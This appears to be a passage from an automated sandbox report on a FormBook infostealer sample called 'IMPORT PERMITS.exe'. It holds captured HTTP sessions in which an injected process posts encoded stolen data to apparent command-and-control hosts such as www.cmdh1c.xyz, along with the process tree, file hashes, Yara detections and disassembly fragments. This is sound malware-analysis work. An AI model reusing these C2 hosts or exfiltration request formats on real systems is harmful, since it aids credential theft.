                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fjV27Ur2nceysXGoP019A2vWIyXowq3632FW+9nqZ7qYEY/H8fTHe6OMohj+IkMNoMsdsNd0QZLtc6ZWBwrwFA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                              Nov 2, 2024 08:14:39.165981054 CET563INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjdmMTg5NDAtMjIzMy00ZTI3LTg0YmItOGJhZmNkNDgyYWI1IiwicGFnZV90aW1lIjoxNzMwNTMxNj


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              44192.168.2.449384199.59.243.227803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:14:41.103035927 CET523OUTGET /t7p4/?SJuP9=UPQLWRgHAD_&Z0WTZ=l9a7eDheKRZy9bhcTeCHdToYa6mt3ij4C0pbULzToM8sx4gmKc4u2ZHXAvhfaYH7/T0zUvL9+kkqYwdWGnSBKq2rvPWRIuzqlymkkYj2zkimPtA3jZhNuM4= HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.deepfy.xyz
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Nov 2, 2024 08:14:41.739500046 CET1236INHTTP/1.1 200 OK
                                                                                                                              date: Sat, 02 Nov 2024 07:14:41 GMT
                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                              content-length: 1462
                                                                                                                              x-request-id: 77f304d7-c0d6-4acd-8309-dca59f2a8b9c
                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AjafRKlUexXON4xiP3zBdseDRd1K/z6td1OAtELXMiyGVUro4fyGxkRWyKJCH0z9ZhnyKACPtRT7AmSvYbtTdw==
                                                                                                                              set-cookie: parking_session=77f304d7-c0d6-4acd-8309-dca59f2a8b9c; expires=Sat, 02 Nov 2024 07:29:41 GMT; path=/
                                                                                                                              connection: close
                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6a 61 66 52 4b 6c 55 65 78 58 4f 4e 34 78 69 50 33 7a 42 64 73 65 44 52 64 31 4b 2f 7a 36 74 64 31 4f 41 74 45 4c 58 4d 69 79 47 56 55 72 6f 34 66 79 47 78 6b 52 57 79 4b 4a 43 48 30 7a 39 5a 68 6e 79 4b 41 43 50 74 52 54 37 41 6d 53 76 59 62 74 54 64 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AjafRKlUexXON4xiP3zBdseDRd1K/z6td1OAtELXMiyGVUro4fyGxkRWyKJCH0z9ZhnyKACPtRT7AmSvYbtTdw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                              Nov 2, 2024 08:14:41.739518881 CET915INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNzdmMzA0ZDctYzBkNi00YWNkLTgzMDktZGNhNTlmMmE4YjljIiwicGFnZV90aW1lIjoxNzMwNTMxNj


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              45192.168.2.449385103.233.82.58803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:14:47.393448114 CET777OUTPOST /6byd/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.cmdh1c.xyz
                                                                                                                              Origin: http://www.cmdh1c.xyz
                                                                                                                              Referer: http://www.cmdh1c.xyz/6byd/
                                                                                                                              Content-Length: 202
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 52 4c 4e 68 4d 50 34 50 51 51 4c 52 49 52 56 45 39 72 55 68 79 52 39 4a 55 78 61 70 6d 44 38 34 36 79 66 57 61 71 58 62 70 4e 54 57 54 4e 53 6d 30 41 6d 74 6d 59 53 65 52 63 44 52 41 69 6f 69 62 4b 64 6f 70 45 6b 62 34 54 75 4c 48 45 78 65 32 6c 58 6f 47 34 4f 6b 6d 4e 42 51 44 7a 41 71 56 65 38 46 48 6a 62 34 39 2f 43 59 6e 6d 34 75 4e 4f 66 59 57 63 4b 6d 68 4d 44 48 67 57 4b 63 68 43 51 43 49 67 4c 2f 6d 31 4f 62 59 33 5a 48 57 71 67 7a 44 69 54 58 6e 6d 48 56 4e 72 45 59 62 65 52 5a 67 4d 50 36 78 66 76 30 30 6c 34 7a 48 30 6d 71 53 6e 5a 39 6e 62 2f 67 78 6b 78 57 74 77 3d 3d
                                                                                                                              Data Ascii: Z0WTZ=RLNhMP4PQQLRIRVE9rUhyR9JUxapmD846yfWaqXbpNTWTNSm0AmtmYSeRcDRAioibKdopEkb4TuLHExe2lXoG4OkmNBQDzAqVe8FHjb49/CYnm4uNOfYWcKmhMDHgWKchCQCIgL/m1ObY3ZHWqgzDiTXnmHVNrEYbeRZgMP6xfv00l4zH0mqSnZ9nb/gxkxWtw==


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              46192.168.2.449386103.233.82.58803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:14:49.933433056 CET797OUTPOST /6byd/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.cmdh1c.xyz
                                                                                                                              Origin: http://www.cmdh1c.xyz
                                                                                                                              Referer: http://www.cmdh1c.xyz/6byd/
                                                                                                                              Content-Length: 222
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 52 4c 4e 68 4d 50 34 50 51 51 4c 52 48 52 6c 45 2f 4d 41 68 6e 68 39 4b 59 52 61 70 76 6a 38 43 36 79 54 57 61 72 54 4c 6f 35 2f 57 51 73 69 6d 75 46 53 74 72 34 53 65 61 38 44 55 45 69 6f 70 62 4b 52 4f 70 42 63 62 34 54 71 4c 48 45 42 65 32 57 50 72 55 59 4f 6d 2f 39 42 57 48 7a 41 71 56 65 38 46 48 6e 79 64 39 2f 61 59 6e 79 45 75 58 76 66 62 62 38 4b 6c 6b 4d 44 48 78 47 4b 59 68 43 51 67 49 68 57 71 6d 7a 43 62 59 31 78 48 52 2b 30 30 61 79 54 52 70 47 47 79 4d 62 31 72 63 4f 6b 47 69 71 48 4e 38 64 44 56 38 44 31 70 57 46 48 39 41 6e 39 4f 36 63 32 55 38 6e 4d 66 32 30 4d 41 72 7a 4f 43 4e 36 51 73 32 30 64 32 2f 70 56 2b 41 66 41 3d
                                                                                                                              Data Ascii: Z0WTZ=RLNhMP4PQQLRHRlE/MAhnh9KYRapvj8C6yTWarTLo5/WQsimuFStr4Sea8DUEiopbKROpBcb4TqLHEBe2WPrUYOm/9BWHzAqVe8FHnyd9/aYnyEuXvfbb8KlkMDHxGKYhCQgIhWqmzCbY1xHR+00ayTRpGGyMb1rcOkGiqHN8dDV8D1pWFH9An9O6c2U8nMf20MArzOCN6Qs20d2/pV+AfA=


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              47192.168.2.449387103.233.82.58803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:14:52.480575085 CET3708OUTPOST /6byd/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.cmdh1c.xyz
                                                                                                                              Origin: http://www.cmdh1c.xyz
                                                                                                                              Referer: http://www.cmdh1c.xyz/6byd/
                                                                                                                              Content-Length: 10302
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 52 4c 4e 68 4d 50 34 50 51 51 4c 52 48 52 6c 45 2f 4d 41 68 6e 68 39 4b 59 52 61 70 76 6a 38 43 36 79 54 57 61 72 54 4c 6f 35 33 57 54 65 71 6d 74 69 4f 74 71 34 53 65 42 63 44 56 45 69 6f 30 62 4a 68 4b 70 42 67 68 34 52 69 4c 48 6c 68 65 77 6a 6a 72 4e 6f 4f 6d 69 4e 42 58 44 7a 41 2f 56 65 73 4a 48 6a 57 64 39 2f 61 59 6e 7a 55 75 42 75 66 62 5a 38 4b 6d 68 4d 44 62 67 57 4b 77 68 43 35 58 49 68 43 36 6d 6a 69 62 62 56 42 48 58 4e 63 30 53 79 54 54 71 47 47 71 4d 62 35 30 63 4f 34 4b 69 71 61 61 38 63 37 56 2b 6c 73 2b 54 32 50 4a 57 58 68 4c 71 73 75 6f 35 56 41 46 78 58 38 75 6c 68 50 61 50 35 6b 6d 31 45 6c 38 36 59 42 6d 64 35 67 46 42 64 37 2f 6d 65 41 48 49 32 5a 6e 61 73 74 52 58 45 43 74 78 4c 50 43 4f 45 42 6a 6a 38 42 56 6c 57 4b 54 73 53 55 37 77 4f 79 48 79 46 31 72 37 47 34 6e 4d 68 63 73 4a 30 46 70 74 37 76 66 62 57 6e 75 62 30 30 65 6f 31 5a 46 64 5a 6e 6d 4c 6a 75 4b 6e 75 4e 37 75 6a 61 6a 47 77 79 34 53 31 38 42 43 44 50 41 79 48 7a 53 67 49 76 57 65 51 68 57 [TRUNCATED]
                                                                                                                              Data Ascii: Z0WTZ=RLNhMP4PQQLRHRlE/MAhnh9KYRapvj8C6yTWarTLo53WTeqmtiOtq4SeBcDVEio0bJhKpBgh4RiLHlhewjjrNoOmiNBXDzA/VesJHjWd9/aYnzUuBufbZ8KmhMDbgWKwhC5XIhC6mjibbVBHXNc0SyTTqGGqMb50cO4Kiqaa8c7V+ls+T2PJWXhLqsuo5VAFxX8ulhPaP5km1El86YBmd5gFBd7/meAHI2ZnastRXECtxLPCOEBjj8BVlWKTsSU7wOyHyF1r7G4nMhcsJ0Fpt7vfbWnub00eo1ZFdZnmLjuKnuN7ujajGwy4S18BCDPAyHzSgIvWeQhWgityYf0v5XnqSptdfyGfdlLtOwrq6DNCtbI4OGWxHBEFOMlLjv6MBbpcCyWFzjfpFZ1o9iRkru6AhdzEWzyHPCJvlCMPc/ibevCVB1Hf5bGDW2ysqyK4jk0pHHIz7F8737Ml53WnI+bQYnIF/mOmSWATjRxKx4JWGAEXW4cO/4BmaTL18e1q/fDMy/DFYd9XnexUsAzXw3gtuyYVKk65vyanH0Wv0rDv4NU1xS0yxzfgMDYok8iC8V2aZcmi551sEqmlt5WRkE4hAuqFTsoMLV2R2FbBPcZF/MBmNXMB8nAfJphiQ30olbVL5HzE39UqOvn5JMx7E8hinBf+2d6zgyOuEA5DkFH3omBREBh7TgHqMyt4ULj1F2VruPvNsWXbKoVuwX6yPrn2p2i7ZYzYd3pvJHuuVwCh+aXxVdBZGiexZfNdDX/lgVwmhzSrnLPCkwQxR+p7q28BIw+lLzR6nyFtT/61vhvtE4Lh7WXDzJ2WK6Deuks3PTBi43VlP8NDjVlAeImlCgluUSHBBJZ2HHFc17xfRxKVmDXNJzYQhUsKAmRnfbn3m8rtMjwrKTSpUvelI4s/obbsEvnz3n6hWDHHtpqOR5qIhE35gHU3Pf1NlHjLusq6bMWtf3JsDZTomCNdp6CDqy29SCuYNjynKXHi07uk/Ov33P [TRUNCATED]
                                                                                                                              Nov 2, 2024 08:14:52.480614901 CET7171OUTData Raw: 50 36 36 66 42 54 6e 4c 31 6c 79 65 65 34 2b 41 44 53 4f 72 70 57 6a 64 48 33 63 2f 46 45 79 6b 78 38 64 6e 54 50 6d 43 71 55 75 67 57 34 64 30 4e 67 61 6f 38 62 33 39 32 64 79 51 47 46 43 42 34 5a 6f 72 6a 4a 77 4e 69 2b 68 5a 5a 50 4a 68 30 62
                                                                                                                              Data Ascii: P66fBTnL1lyee4+ADSOrpWjdH3c/FEykx8dnTPmCqUugW4d0Ngao8b392dyQGFCB4ZorjJwNi+hZZPJh0bg+WwL/nhI/D6PSFMSmca2lrd94sxPGyZy6yzuYhpDPccua4MmX5Ng/FN1j+VqW/FUyzOxOcVlihckUH7bkUytmzEAzrCEGzNuUakQgy/dUEIHD0SsGT3ESPdC37Ey3Hrh+X9Eh9Q7KDulaUN5+cFiS32l1GjWmfjb


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              48192.168.2.449388103.233.82.58803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:14:55.020785093 CET523OUTGET /6byd/?Z0WTZ=cJlBP4gdQg33LxRaxIBB9TpDVwunrRcR6TPzX8fihpDKfN+C3z32iLCDUP2OAgtSF65Fjxsz3xegGgg43kjMMLGB+pU0EQVXDohFVmD6n/q0/xsVCvDFB+8=&SJuP9=UPQLWRgHAD_ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.cmdh1c.xyz
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Nov 2, 2024 08:14:56.642805099 CET320INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Sat, 02 Nov 2024 07:14:48 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Content-Length: 162
                                                                                                                              Connection: close
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                              Statistics

                                                                                                                              CPU Usage

                                                                                                                              Click to jump to process

                                                                                                                              Memory Usage

                                                                                                                              Click to jump to process

                                                                                                                              High Level Behavior Distribution

                                                                                                                              Click to dive into process behavior distribution

                                                                                                                              Behavior

                                                                                                                              Click to jump to process

                                                                                                                              System Behavior

                                                                                                                              General

                                                                                                                              Target ID:0
                                                                                                                              Start time:03:10:54
                                                                                                                              Start date:02/11/2024
                                                                                                                              Path:C:\Users\user\Desktop\IMPORT PERMITS.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\Desktop\IMPORT PERMITS.exe"
                                                                                                                              Imagebase:0x5e0000
                                                                                                                              File size:775'168 bytes
                                                                                                                              MD5 hash:B648DB78EAC01C6C7311E34D232B4ED7
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:2
                                                                                                                              Start time:03:11:03
                                                                                                                              Start date:02/11/2024
                                                                                                                              Path:C:\Users\user\Desktop\IMPORT PERMITS.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\Desktop\IMPORT PERMITS.exe"
                                                                                                                              Imagebase:0x920000
                                                                                                                              File size:775'168 bytes
                                                                                                                              MD5 hash:B648DB78EAC01C6C7311E34D232B4ED7
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2056520278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2058360059.0000000001750000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2058495171.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:6
                                                                                                                              Start time:03:11:26
                                                                                                                              Start date:02/11/2024
                                                                                                                              Path:C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe"
                                                                                                                              Imagebase:0x710000
                                                                                                                              File size:140'800 bytes
                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4121787054.0000000004A50000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              Reputation:high
                                                                                                                              Has exited:false

                                                                                                                              General

                                                                                                                              Target ID:7
                                                                                                                              Start time:03:11:28
                                                                                                                              Start date:02/11/2024
                                                                                                                              Path:C:\Windows\SysWOW64\PATHPING.EXE
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Windows\SysWOW64\PATHPING.EXE"
                                                                                                                              Imagebase:0x920000
                                                                                                                              File size:16'896 bytes
                                                                                                                              MD5 hash:078AD26F906EF2AC1661FCAC84084256
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4121846462.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4121706840.00000000008C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:false

                                                                                                                              General

                                                                                                                              Target ID:8
                                                                                                                              Start time:03:11:41
                                                                                                                              Start date:02/11/2024
                                                                                                                              Path:C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe"
                                                                                                                              Imagebase:0x710000
                                                                                                                              File size:140'800 bytes
                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4123927554.00000000057E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              Reputation:high
                                                                                                                              Has exited:false

                                                                                                                              General

                                                                                                                              Target ID:9
                                                                                                                              Start time:03:11:54
                                                                                                                              Start date:02/11/2024
                                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                              Imagebase:0x7ff6bf500000
                                                                                                                              File size:676'768 bytes
                                                                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Disassembly

                                                                                                                              Reset < >

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:9.1%
                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                Signature Coverage:1.8%
                                                                                                                                Total number of Nodes:164
                                                                                                                                Total number of Limit Nodes:7
                                                                                                                                execution_graph 18747 2934ea0 18748 2934ec6 18747->18748 18749 293502b 18747->18749 18748->18749 18751 2931188 18748->18751 18752 2935120 PostMessageW 18751->18752 18753 293518c 18752->18753 18753->18748 18754 104af30 18755 104af3f 18754->18755 18757 104b017 18754->18757 18758 104b039 18757->18758 18759 104b05c 18757->18759 18758->18759 18760 104b260 GetModuleHandleW 18758->18760 18759->18755 18761 104b28d 18760->18761 18761->18755 18545 2933379 18546 293337a 18545->18546 18551 2933c96 18546->18551 18568 2933c28 18546->18568 18584 2933c38 18546->18584 18547 293321c 18552 2933c24 18551->18552 18554 2933c99 18551->18554 18600 293415f 18552->18600 18604 29342ba 18552->18604 18609 2934194 18552->18609 18614 2934676 18552->18614 18618 29342f0 18552->18618 18622 29341d0 18552->18622 18627 29346ee 18552->18627 18632 2933f68 18552->18632 18638 2934528 18552->18638 18643 293402b 18552->18643 18648 293462b 18552->18648 18653 29343e2 18552->18653 18658 2934723 18552->18658 18553 2933c76 18553->18547 18554->18547 18569 2933c52 18568->18569 18571 29341d0 2 API calls 18569->18571 18572 29342f0 2 API calls 18569->18572 18573 2934676 2 API calls 18569->18573 18574 2934194 2 API calls 18569->18574 18575 29342ba 2 API calls 18569->18575 18576 293415f 2 API calls 18569->18576 18577 2934723 2 API calls 18569->18577 18578 29343e2 2 API calls 18569->18578 18579 293462b 2 API calls 18569->18579 18580 293402b 2 API calls 18569->18580 18581 2934528 2 API calls 18569->18581 18582 2933f68 2 API calls 18569->18582 18583 29346ee 2 API calls 18569->18583 18570 2933c76 18570->18547 18571->18570 18572->18570 18573->18570 18574->18570 18575->18570 18576->18570 18577->18570 18578->18570 18579->18570 18580->18570 18581->18570 18582->18570 18583->18570 18585 2933c52 18584->18585 18587 29341d0 2 API calls 18585->18587 18588 29342f0 2 API calls 18585->18588 18589 2934676 2 API calls 18585->18589 18590 2934194 2 API calls 18585->18590 18591 29342ba 2 API calls 18585->18591 18592 293415f 2 API calls 18585->18592 18593 2934723 2 API calls 18585->18593 18594 29343e2 2 API calls 18585->18594 18595 293462b 2 API calls 18585->18595 18596 293402b 2 API calls 18585->18596 18597 2934528 2 API calls 18585->18597 18598 2933f68 2 API calls 18585->18598 18599 29346ee 2 API calls 18585->18599 18586 2933c76 18586->18547 18587->18586 18588->18586 18589->18586 18590->18586 18591->18586 18592->18586 